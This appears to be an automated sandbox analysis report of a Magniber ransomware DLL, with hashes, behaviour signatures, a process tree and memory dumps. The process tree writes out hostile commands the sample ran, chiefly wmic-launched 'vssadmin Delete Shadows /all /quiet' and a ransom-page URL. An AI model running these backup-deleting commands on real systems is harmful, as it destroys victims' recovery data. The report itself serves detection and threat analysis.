Analysis

  • max time kernel
    120s
  • max time network
    139s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    01-01-2024 15:27

General

  • Target

    759c06eedcadd60ebd2aa3790eefa40d505044080cea4e1477d845611f322b4c.dll

  • Size

    38KB

  • MD5

    1f837affe14eeee652ae0271f0cb3804

  • SHA1

    5f55dad94a03100542c61777233f7846f9376625

  • SHA256

    759c06eedcadd60ebd2aa3790eefa40d505044080cea4e1477d845611f322b4c

  • SHA512

    a620bbb9b59fa93cff35d95c6c2000226361fcbcb869d4ec300caec97723802516a430d663e26c129b8c42f1ef9c27b90963896ac86207c7193513567850691b

  • SSDEEP

    768:FGcHvpu++E69ZxPGlISQAtxaYzUmFCL+4pO6Dzhc:Fju++E6XxPGlISR5UmoLTO2+

Score
10/10

Malware Config

Signatures

  • Detect magniber ransomware 2 IoCs
  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

  • Process spawned unexpected child process 9 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Renames multiple (84) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Suspicious use of SetThreadContext 4 IoCs
  • Interacts with shadow copies 2 TTPs 8 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
  • Modifies registry class 11 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 11 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of UnmapMainImage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\759c06eedcadd60ebd2aa3790eefa40d505044080cea4e1477d845611f322b4c.dll,#1
    1⤵
    • Suspicious use of SetThreadContext
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of WriteProcessMemory
    PID:2928
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:564
    • C:\Windows\system32\wbem\wmic.exe
      C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1124
    • C:\Windows\system32\cmd.exe
      cmd /c "start http://5c5cf6f870b88a5024upywsch.uscatch.club/upywsch^&2^&33016245^&84^&369^&12"?
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2064
    • C:\Windows\system32\notepad.exe
      notepad.exe C:\Users\Public\readme.txt?
      2⤵
      • Opens file in notepad (likely ransom note)
      PID:1228
  • C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
    1⤵
      PID:1876
    • C:\Windows\Explorer.EXE
      C:\Windows\Explorer.EXE
      1⤵
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of UnmapMainImage
      • Suspicious use of WriteProcessMemory
      PID:1380
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        2⤵
          PID:2580
          • C:\Windows\system32\wbem\WMIC.exe
            C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
            3⤵
              PID:1576
          • C:\Windows\system32\wbem\wmic.exe
            C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
            2⤵
              PID:2468
          • C:\Windows\system32\Dwm.exe
            "C:\Windows\system32\Dwm.exe"
            1⤵
            • Modifies registry class
            • Suspicious use of WriteProcessMemory
            PID:1344
            • C:\Windows\system32\cmd.exe
              cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:3044
            • C:\Windows\system32\wbem\wmic.exe
              C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
              2⤵
                PID:3064
            • C:\Windows\system32\taskhost.exe
              "taskhost.exe"
              1⤵
              • Modifies registry class
              • Suspicious use of WriteProcessMemory
              PID:1260
              • C:\Windows\system32\cmd.exe
                cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:1448
                • C:\Windows\system32\wbem\WMIC.exe
                  C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
                  3⤵
                    PID:2432
                • C:\Windows\system32\wbem\wmic.exe
                  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
                  2⤵
                    PID:2560
                • C:\Windows\system32\vssvc.exe
                  C:\Windows\system32\vssvc.exe
                  1⤵
                    PID:2504
                  • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2236 CREDAT:275457 /prefetch:2
                    1⤵
                    • Modifies Internet Explorer settings
                    • Suspicious use of SetWindowsHookEx
                    PID:2768
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin.exe Delete Shadows /all /quiet
                    1⤵
                    • Interacts with shadow copies
                    PID:2696
                  • C:\Windows\system32\wbem\wmic.exe
                    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                    1⤵
                      PID:2964
                    • C:\Windows\system32\CompMgmtLauncher.exe
                      CompMgmtLauncher.exe
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2772
                    • C:\Windows\system32\vssadmin.exe
                      vssadmin.exe Delete Shadows /all /quiet
                      1⤵
                      • Interacts with shadow copies
                      PID:1860
                    • C:\Windows\system32\cmd.exe
                      cmd /c CompMgmtLauncher.exe
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1900
                    • C:\Program Files\Internet Explorer\iexplore.exe
                      "C:\Program Files\Internet Explorer\iexplore.exe" http://5c5cf6f870b88a5024upywsch.uscatch.club/upywsch&2&33016245&84&369&12?
                      1⤵
                      • Modifies Internet Explorer settings
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SetWindowsHookEx
                      • Suspicious use of WriteProcessMemory
                      PID:2236
                    • C:\Windows\system32\wbem\WMIC.exe
                      C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
                      1⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1708
                    • C:\Windows\system32\CompMgmtLauncher.exe
                      CompMgmtLauncher.exe
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1676
                      • C:\Windows\system32\wbem\wmic.exe
                        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                        2⤵
                          PID:956
                      • C:\Windows\system32\vssadmin.exe
                        vssadmin.exe Delete Shadows /all /quiet
                        1⤵
                        • Process spawned unexpected child process
                        • Interacts with shadow copies
                        PID:1832
                      • C:\Windows\system32\cmd.exe
                        cmd /c CompMgmtLauncher.exe
                        1⤵
                        • Process spawned unexpected child process
                        • Suspicious use of WriteProcessMemory
                        PID:2288
                      • C:\Windows\system32\vssadmin.exe
                        vssadmin.exe Delete Shadows /all /quiet
                        1⤵
                        • Process spawned unexpected child process
                        • Interacts with shadow copies
                        PID:1756
                      • C:\Windows\system32\wbem\WMIC.exe
                        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
                        1⤵
                          PID:884
                        • C:\Windows\system32\CompMgmtLauncher.exe
                          CompMgmtLauncher.exe
                          1⤵
                          • Suspicious use of WriteProcessMemory
                          PID:1960
                          • C:\Windows\system32\wbem\wmic.exe
                            "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                            2⤵
                              PID:2644
                          • C:\Windows\system32\vssadmin.exe
                            vssadmin.exe Delete Shadows /all /quiet
                            1⤵
                            • Process spawned unexpected child process
                            • Interacts with shadow copies
                            PID:1728
                          • C:\Windows\system32\vssadmin.exe
                            vssadmin.exe Delete Shadows /all /quiet
                            1⤵
                            • Process spawned unexpected child process
                            • Interacts with shadow copies
                            PID:900
                          • C:\Windows\system32\cmd.exe
                            cmd /c CompMgmtLauncher.exe
                            1⤵
                            • Process spawned unexpected child process
                            • Suspicious use of WriteProcessMemory
                            PID:2152
                          • C:\Windows\system32\CompMgmtLauncher.exe
                            CompMgmtLauncher.exe
                            1⤵
                              PID:2168
                              • C:\Windows\system32\wbem\wmic.exe
                                "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                                2⤵
                                  PID:1476
                              • C:\Windows\system32\vssadmin.exe
                                vssadmin.exe Delete Shadows /all /quiet
                                1⤵
                                • Process spawned unexpected child process
                                • Interacts with shadow copies
                                PID:208
                              • C:\Windows\system32\cmd.exe
                                cmd /c CompMgmtLauncher.exe
                                1⤵
                                • Process spawned unexpected child process
                                PID:2972
                              • C:\Windows\system32\vssadmin.exe
                                vssadmin.exe Delete Shadows /all /quiet
                                1⤵
                                • Process spawned unexpected child process
                                • Interacts with shadow copies
                                PID:1640

                              Network

                              MITRE ATT&CK Enterprise v15

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

                                Filesize

                                914B

                                MD5

                                e4a68ac854ac5242460afd72481b2a44

                                SHA1

                                df3c24f9bfd666761b268073fe06d1cc8d4f82a4

                                SHA256

                                cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f

                                SHA512

                                5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

                                Filesize

                                65KB

                                MD5

                                ac05d27423a85adc1622c714f2cb6184

                                SHA1

                                b0fe2b1abddb97837ea0195be70ab2ff14d43198

                                SHA256

                                c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

                                SHA512

                                6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

                                Filesize

                                1KB

                                MD5

                                a266bb7dcc38a562631361bbf61dd11b

                                SHA1

                                3b1efd3a66ea28b16697394703a72ca340a05bd5

                                SHA256

                                df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

                                SHA512

                                0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

                                Filesize

                                252B

                                MD5

                                07e784e322d37556de9d5e3e300cd912

                                SHA1

                                9222ecf24a983f64500c97317fed8ecddf943324

                                SHA256

                                4b1df956e041e408b59ab039978a62a1381c6966f162e8d21bb2001ab0857180

                                SHA512

                                55736f3ebbc8514347a8c8d5b028d94cb5ca36b9d6354666a054434fd3c0b0ea5acba2379cb870b09ef081538c68108b34810d5077af7d531081b2ece285dba5

                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

                                Filesize

                                242B

                                MD5

                                c385040a01cd46646739ff440ddc28ce

                                SHA1

                                2bb64a6e81ad9d5e06b1c54c82b2e337321b9c65

                                SHA256

                                e31e52d7175064a913191f1cf164e9c33652c59819fc898f39302a4148099bab

                                SHA512

                                7746957fd54ff18ca6370a7ee5ffbacaf11a0bcd244a209324355135a90282077d9d529ccc34b8a4e0b41ef9bae0e9369f345b5a9e66138fa4409c99ec37c8e5

                              • C:\Users\Admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico

                                Filesize

                                4KB

                                MD5

                                da597791be3b6e732f0bc8b20e38ee62

                                SHA1

                                1125c45d285c360542027d7554a5c442288974de

                                SHA256

                                5b2c34b3c4e8dd898b664dba6c3786e2ff9869eff55d673aa48361f11325ed07

                                SHA512

                                d8dc8358727590a1ed74dc70356aedc0499552c2dc0cd4f7a01853dd85ceb3aead5fbdc7c75d7da36db6af2448ce5abdff64cebdca3533ecad953c061a9b338e

                              • C:\Users\Admin\AppData\Local\Temp\Tar8166.tmp

                                Filesize

                                171KB

                                MD5

                                9c0c641c06238516f27941aa1166d427

                                SHA1

                                64cd549fb8cf014fcd9312aa7a5b023847b6c977

                                SHA256

                                4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

                                SHA512

                                936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

                              • memory/1260-0-0x00000000003A0000-0x00000000003A5000-memory.dmp

                                Filesize

                                20KB

                              • memory/1260-16-0x00000000003A0000-0x00000000003A5000-memory.dmp

                                Filesize

                                20KB

                              • memory/2928-5-0x00000000002C0000-0x00000000002C1000-memory.dmp

                                Filesize

                                4KB

                              • memory/2928-9-0x0000000001D50000-0x0000000001D51000-memory.dmp

                                Filesize

                                4KB

                              • memory/2928-3-0x00000000002A0000-0x00000000002A1000-memory.dmp

                                Filesize

                                4KB

                              • memory/2928-7-0x00000000002E0000-0x00000000002E1000-memory.dmp

                                Filesize

                                4KB

                              • memory/2928-8-0x00000000002F0000-0x00000000002F1000-memory.dmp

                                Filesize

                                4KB

                              • memory/2928-17-0x0000000004770000-0x0000000004771000-memory.dmp

                                Filesize

                                4KB

                              • memory/2928-280-0x0000000004790000-0x0000000004791000-memory.dmp

                                Filesize

                                4KB

                              • memory/2928-1-0x0000000001DF0000-0x0000000002713000-memory.dmp

                                Filesize

                                9.1MB

                              • memory/2928-10-0x0000000001D60000-0x0000000001D61000-memory.dmp

                                Filesize

                                4KB

                              • memory/2928-11-0x0000000002750000-0x0000000002751000-memory.dmp

                                Filesize

                                4KB

                              • memory/2928-12-0x0000000002760000-0x0000000002761000-memory.dmp

                                Filesize

                                4KB

                              • memory/2928-13-0x0000000002770000-0x0000000002771000-memory.dmp

                                Filesize

                                4KB

                              • memory/2928-14-0x0000000002780000-0x0000000002781000-memory.dmp

                                Filesize

                                4KB

                              • memory/2928-4-0x00000000002B0000-0x00000000002B1000-memory.dmp

                                Filesize

                                4KB